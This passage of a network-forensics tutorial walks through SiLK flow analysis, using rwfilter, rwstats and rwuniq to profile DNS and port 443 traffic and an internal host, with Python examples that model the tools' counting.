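    counts = Counter(ipaddress.ip_network(f"{ip}/{prefix}", strict=False) for ip in _hosts(ips))
    return [(str(net), counts[net]) for net in sorted(counts)]


if __name__ == "__main__":
    for ipset in (SAMPLE_IPS, CLUSTERED_IPS):
        print("\n".join(format_statistics(set_statistics(ipset))))
        print(structure_total(ipset))
        for net, n in network_structure(ipset, 24):
            print(f"{net:>18}| {n}")
        print()
```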
<p></p><p>Resolve IP addresses to host names using <b><i>rwresolve</i></b>, taking the data from <b><i>rwsetcat </i></b>output.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsetcat ip.set | rwresolve</span></b></span>
<span style="color: white;">one.one.one.one</span>
<span style="color: white;">2.2.2.2</span>
<span style="color: white;">3.3.3.3</span>
<span style="color: white;">4.4.4.4</span>
<span style="color: white;">dynamic-005-005-005-005.5.5.pool.telefonica.de</span>
</pre></td></tr></tbody></table></div>
<p></p><p>About to do another resolve. Review the data first via <b><i>rwcut</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields=sip,dip --num-recs=5 --ipv6-policy=ignore</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Doing the resolve by specifying the <i>getnameinfo</i> resolver.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut 8.rw --fields=sip,dip --num-recs=5 --ipv6-policy=ignore | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwresolve --ip-fields=1,2 --resolver=getnameinfo</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
<span style="color: white;">dns.google| 172.28.10.137|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Find the top 5 DNS servers seen within the flows using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b>.<br />Interesting that a public DNS server is seen as the device with the highest number of packets. I was expecting to see an internal DNS server. Then again, it could be the location of this sensor.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=in --sport=53 | rwstats --values=packets \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1215737 Records for 276 Bins and 1348651 Total Packets</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Packets</span>
<span style="color: white;"> sIP| Packets| %Packets| cumul_%|</span>
<span style="color: white;"> 8.8.8.8| 1330414| 98.647760| 98.647760|</span>
<span style="color: white;"> 199.212.0.63| 9296| 0.689281| 99.337041|</span>
<span style="color: white;"> 199.180.180.63| 2011| 0.149112| 99.486153|</span>
<span style="color: white;"> 204.61.216.50| 1272| 0.094316| 99.580470|</span>
<span style="color: white;"> 205.251.199.83| 586| 0.043451| 99.623920|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Looking at the DNS communication from the bytes perspective using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=in --sport=53 | rwstats --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1215737 Records for 276 Bins and 212797321 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 8.8.8.8| 209509379| 98.454895| 98.454895|</span>
<span style="color: white;"> 199.212.0.63| 758309| 0.356353| 98.811248|</span>
<span style="color: white;"> 199.180.180.63| 710009| 0.333655| 99.144903|</span>
<span style="color: white;"> 204.61.216.50| 449465| 0.211217| 99.356120|</span>
<span style="color: white;"> 193.0.9.10| 205880| 0.096749| 99.452870|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Looking at it from the number of flow records perspective using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><b><i><!--HTML generated using hilite.me--></i></b></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=in --sport=53 | rwstats --values=records \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1215737 Records for 276 Bins and 1215737 Total Records</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;"> sIP| Records| %Records| cumul_%|</span>
<span style="color: white;"> 8.8.8.8| 1200021| 98.707286| 98.707286|</span>
<span style="color: white;"> 199.212.0.63| 7931| 0.652361| 99.359648|</span>
<span style="color: white;"> 199.180.180.63| 2008| 0.165167| 99.524815|</span>
<span style="color: white;"> 204.61.216.50| 1271| 0.104546| 99.629361|</span>
<span style="color: white;"> 193.0.9.10| 581| 0.047790| 99.677151|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>The above relates to traffic coming into the enterprise. What about traffic going out to DNS servers?</p><p>Looking at it from a different perspective using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwstats --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1225733 Records for 10 Bins and 110746579 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.10.137| 110716457| 99.972801| 99.972801|</span>
<span style="color: white;"> 172.28.30.2| 13824| 0.012483| 99.985284|</span>
<span style="color: white;"> 172.28.20.3| 12528| 0.011312| 99.996596|</span>
<span style="color: white;"> 172.28.20.5| 960| 0.000867| 99.997463|</span>
<span style="color: white;"> 172.28.30.5| 680| 0.000614| 99.998077|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>The number of flow records using <b><i>rwfilter </i></b>and <b><i>rwstats.</i></b></p><p><b><i><!--HTML generated using hilite.me--></i></b></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=17 --pass=stdout --type=out,outweb --dport=53 | \</span></b></span>
<b><span style="color: #fcff01;">rwstats --values=records --fields sIP --count=5 --ipv6-policy=ignore</span></b>
<span style="color: white;">INPUT: 1225733 Records for 10 Bins and 1225733 Total Records</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;"> sIP| Records| %Records| cumul_%|</span>
<span style="color: white;"> 172.28.10.137| 1225669| 99.994779| 99.994779|</span>
<span style="color: white;"> 172.28.30.2| 29| 0.002366| 99.997145|</span>
<span style="color: white;"> 172.28.20.3| 24| 0.001958| 99.999103|</span>
<span style="color: white;"> 172.28.10.89| 3| 0.000245| 99.999347|</span>
<span style="color: white;"> 172.28.30.5| 2| 0.000163| 99.999510|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Digging deeper to see what the host at <i>172.28.10.137</i> is doing, using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwstats --values=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sIP,dip,dport --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 1225733 Records for 359 Bins and 110746579 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|dPort| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.10.137| 8.8.8.8| 53| 108039369| 97.555491| 97.555491|</span>
<span style="color: white;"> 172.28.10.137| 199.212.0.63| 53| 1382580| 1.248418| 98.803909|</span>
<span style="color: white;"> 172.28.10.137| 192.175.48.6| 53| 300216| 0.271084| 99.074993|</span>
<span style="color: white;"> 172.28.10.137| 192.175.48.42| 53| 299097| 0.270073| 99.345066|</span>
<span style="color: white;"> 172.28.10.137| 199.180.180.63| 53| 153126| 0.138267| 99.483333|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>What is your conclusion from the above?</p><p>Which sensor is this traffic coming from? Using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ </span><span style="color: #fcff01;"><b>rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwstats --values=records \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields sensor --count=5 --ipv6-policy=ignore --no-percent</b></span>
<span style="color: white;">INPUT: 1225733 Records for 1 Bin and 1225733 Total Records</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Records</span>
<span style="color: white;"> sensor| Records|</span>
<span style="color: white;"> Internal| 1225733|</span>
</pre></td></tr></tbody></table></div>
</div><p>Looking at it from a different perspective via <b><i>rwfilter</i></b> and <b><i>rwuniq</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=17 --pass=stdout --type=out,outweb --dport=53 | rwuniq --values=flows \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=sensor</b></span>
<span style="color: white;"> sensor| Records|</span>
<span style="color: white;"> Internal| 1225733|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Looking at the address 172.28.10.137 to identify all of its communication. Per type and protocol, count the distinct source and destination IPs and source and destination ports, and sort the results. Doing this once again via <b><i>rwfilter</i></b> and <b><i>rwuniq</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=all --any-address=172.28.10.137 | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwuniq --values=flows,distinct:sip,distinct:dip,distinct:sport,distinct:dport \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields type,protocol --sort</b></span>
<span style="color: white;"> type|pro| Records| sIP-Distinct| dIP-Distinct|sPort|dPort|</span>
<span style="color: white;"> in| 1| 160| 8| 1| 1| 1|</span>
<span style="color: white;"> in| 6| 408473| 8| 1|21465|65477|</span>
<span style="color: white;"> in| 8| 1| 1| 1| 1| 1|</span>
<span style="color: white;"> in| 17| 1245841| 280| 1| 279|14462|</span>
<span style="color: white;"> in| 63| 1| 1| 1| 1| 1|</span>
<span style="color: white;"> out| 1| 139| 1| 8| 1| 1|</span>
<span style="color: white;"> out| 6| 12106| 1| 8| 21| 9732|</span>
<span style="color: white;"> out| 17| 1230067| 1| 355| 8708| 99|</span>
<span style="color: white;"> inweb| 6| 10791| 294| 1| 185| 7857|</span>
</pre></td></tr></tbody></table></div>
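<p>The rwstats and rwuniq output above hides two details worth understanding: the %Bytes and cumul_% columns are percentages of the whole input (not of the top N), and <i>--values=distinct:sip</i> counts distinct values per bin rather than records. The following is an added example, not code from the original post or from SiLK: it runs a small rwfilter/rwstats/rwuniq-style pipeline over constructed flow records (field names follow the post's commands; the <i>--threshold</i> and <i>--any-address</i> behaviour is modelled as described in the comments).</p>

```python
from collections import defaultdict

# Constructed flow records (not from the post's repository); field names follow
# the SiLK fields used in the post's rwfilter/rwstats/rwuniq commands.
FLOWS = [
    dict(type="out", sip="172.28.10.137", dip="8.8.8.8", sport=51000, dport=53, protocol=17, bytes=600, packets=6),
    dict(type="out", sip="172.28.10.137", dip="8.8.8.8", sport=51001, dport=53, protocol=17, bytes=400, packets=4),
    dict(type="out", sip="172.28.10.137", dip="199.212.0.63", sport=51002, dport=53, protocol=17, bytes=200, packets=2),
    dict(type="out", sip="172.28.30.2", dip="8.8.8.8", sport=40000, dport=53, protocol=17, bytes=100, packets=1),
    dict(type="out", sip="172.28.20.3", dip="1.1.1.1", sport=40001, dport=53, protocol=17, bytes=100, packets=1),
    dict(type="outweb", sip="172.28.20.6", dip="203.0.113.9", sport=40002, dport=443, protocol=6, bytes=5000, packets=10),
    dict(type="in", sip="8.8.8.8", dip="172.28.10.137", sport=53, dport=51000, protocol=17, bytes=900, packets=6),
]


def rwfilter(flows, any_address=None, **criteria):
    """Keep records matching every criterion (a value may be a set of allowed values).

    any_address mimics --any-address: the address may be the source or the destination.
    """
    def matches(rec):
        if any_address is not None and any_address not in (rec["sip"], rec["dip"]):
            return False
        for field, wanted in criteria.items():
            allowed = wanted if isinstance(wanted, (set, frozenset)) else {wanted}
            if rec[field] not in allowed:
                return False
        return True
    return [rec for rec in flows if matches(rec)]


def rwstats(flows, fields, value="records", count=None, threshold=None):
    """Top bins by value with %value and cumul_% columns, like rwstats.

    count keeps the top N bins; threshold keeps bins whose value is at least
    the threshold (the post's --threshold=7298 gave 'Top 1 bins by Bytes').
    Percentages are of the total over all input records, not of the top N.
    """
    bins = defaultdict(int)
    for rec in flows:
        key = tuple(rec[f] for f in fields)
        bins[key] += 1 if value == "records" else rec[value]
    total = sum(bins.values())
    ranked = sorted(bins.items(), key=lambda kv: (-kv[1], kv[0]))
    if threshold is not None:
        ranked = [kv for kv in ranked if kv[1] >= threshold]
    if count is not None:
        ranked = ranked[:count]
    rows, cumul = [], 0.0
    for key, volume in ranked:
        pct = 100.0 * volume / total if total else 0.0
        cumul += pct
        rows.append((key, volume, round(pct, 6), round(cumul, 6)))
    return rows


def rwuniq(flows, fields, distinct=()):
    """Record count per key plus distinct counts of other fields (--values=distinct:X)."""
    records = defaultdict(int)
    seen = defaultdict(lambda: defaultdict(set))
    for rec in flows:
        key = tuple(rec[f] for f in fields)
        records[key] += 1
        for field in distinct:
            seen[key][field].add(rec[field])
    return {key: (records[key], tuple(len(seen[key][f]) for f in distinct))
            for key in sorted(records)}


if __name__ == "__main__":
    outbound_dns = rwfilter(FLOWS, type={"out", "outweb"}, dport=53, protocol=17)
    for row in rwstats(outbound_dns, ("sip",), value="bytes", count=5):
        print(row)
    host = rwfilter(FLOWS, any_address="172.28.10.137")
    for key, (n, distincts) in rwuniq(host, ("type", "protocol"),
                                      distinct=("sip", "dip", "sport", "dport")).items():
        print(key, n, distincts)
```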
<p></p><p>Finding the top 3 unique destination ports for traffic going outbound using <b><i>rwfilter</i></b> and <b><i>rwuniq</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=out,outweb | rwstats --value=flows \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=dport --count=3</b></span>
<span style="color: white;">INPUT: 1894243 Records for 31811 Bins and 1894243 Total Records</span>
<span style="color: white;">OUTPUT: Top 3 Bins by Records</span>
<span style="color: white;">dPort| Records| %Records| cumul_%|</span>
<span style="color: white;"> 53| 1225733| 64.708329| 64.708329|</span>
<span style="color: white;"> 443| 120219| 6.346546| 71.054875|</span>
<span style="color: white;"> 9573| 9755| 0.514981| 71.569857|</span>
</pre></td></tr></tbody></table></div>
<p></p><p>Since I've done some work with port 53 above, let's look at port 443.</p><p>Find the top 5 source IPs communicating via port 443 whose flows average 250 or more bytes per packet. Note the <b><i>rwfilter</i></b> <i>--bytes-per-packet=250-.</i> Once again, using <b><i>rwfilter </i></b>and <b><i>rwstats</i></b>.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=250- | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwstats --value=bytes --fields=sip --count=5 --ipv6-policy=ignore</b></span>
<span style="color: white;">INPUT: 120213 Records for 10 Bins and 691383585 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| Bytes| %Bytes| cumul_%|</span>
<span style="color: white;"> 172.28.20.6| 130274858| 18.842631| 18.842631|</span>
<span style="color: white;"> 172.28.30.5| 114087108| 16.501275| 35.343906|</span>
<span style="color: white;"> 172.28.30.2| 104686092| 15.141536| 50.485442|</span>
<span style="color: white;"> 172.28.30.3| 90222518| 13.049560| 63.535002|</span>
<span style="color: white;"> 172.28.20.3| 72788328| 10.527922| 74.062925|</span>
</pre></td></tr></tbody></table></div>
<p>Now looking at flow records with 0-250 bytes per packet. Note the <b><i>rwfilter</i></b> <i>--bytes-per-packet=0-250.</i> Adding the duration field to this activity. Interesting: all of these flows are a single packet with a duration of 0. Scanning?</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--protocol=0- --pass=stdout --type=out,outweb --dport=443 --bytes-per-packet=0-250 | \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>rwstats --value=bytes --fields=sip,dip,sport,dport,packets,duration --count=5 \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--ipv6-policy=ignore --no-</span><span>percent</span></span></b>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sIP| dIP|sPort|dPort| packets|durat| Bytes|</span>
<span style="color: white;"> 172.28.30.4| 23.58.146.215|57496| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.20.6| 23.58.146.215|49308| 443| 1| 0| 124|</span>
<span style="color: white;"> 172.28.30.4| 184.51.157.69|58644| 443| 1| 0| 124|</span>
</pre></td></tr></tbody></table></div>
<br />Find flows where the duration is 0 and the bytes per packet are at most 250, using <b><i>rwfilter </i></b>(<i>--duration=0 --bytes-per-packet=0-250</i>) and <b><i>rwstats</i></b>. The start time is added to the fields and rounded to the hour with <i>--bin=3600</i>, as the sTime column shows.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8
9</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--type=out,outweb --dport=443 --bytes-per-packet=0-250 --duration=0 | rwstats --value=bytes \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--fields=stime,sip,dip,sport,dport,packets,duration --count=5 --ipv6-policy=ignore --no-percent --bin=3600</b></span>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| Bytes|</span>
<span style="color: white;">2022/02/18T18:00:00| 172.28.20.6| 23.58.146.215|49308| 443| 1| 0| 124|</span>
<span style="color: white;">2022/02/17T17:00:00| 172.28.20.6| 23.58.146.216|56289| 443| 1| 0| 124|</span>
<span style="color: white;">2022/03/24T15:00:00| 172.28.30.4| 184.51.157.69|58644| 443| 1| 0| 124|</span>
<span style="color: white;">2022/03/04T17:00:00| 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| 124|</span>
<span style="color: white;">2022/03/06T21:00:00| 172.28.30.3| 23.58.146.216|65523| 443| 1| 0| 124|</span>
</pre></td></tr></tbody></table></div>
<div><br />Add the type column to validate the direction of the traffic. Still using <b><i>rwfilter</i></b> and <b><i>rwstats</i></b>.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/04/01 --protocol=0- --pass=stdout --type=out,outweb \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--dport=443 --bytes-per-packet=0-250 --duration=0 | rwstats --value=bytes --fields=stime,sip,dip,sport,dport,packets,duration,type \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--count</span></b></span><b><span style="color: #fcff01;"><span>=5 --ipv6-policy=ignore --no-percent --bin=3600</span></span></b>
<span style="color: white;">INPUT: 6 Records for 6 Bins and 744 Total Bytes</span>
<span style="color: white;">OUTPUT: Top 5 Bins by Bytes</span>
<span style="color: white;"> sTime| sIP| dIP|sPort|dPort| packets|durat| type| Bytes|</span>
<span style="color: white;">2022/03/04T17:00:00| 172.28.30.3| 23.58.146.216|56311| 443| 1| 0| out| 124|</span>
<span style="color: white;">2022/03/24T15:00:00| 172.28.30.4| 184.51.157.69|58644| 443| 1| 0| out| 124|</span>
<span style="color: white;">2022/02/17T17:00:00| 172.28.20.6| 23.58.146.216|56289| 443| 1| 0| out| 124|</span>
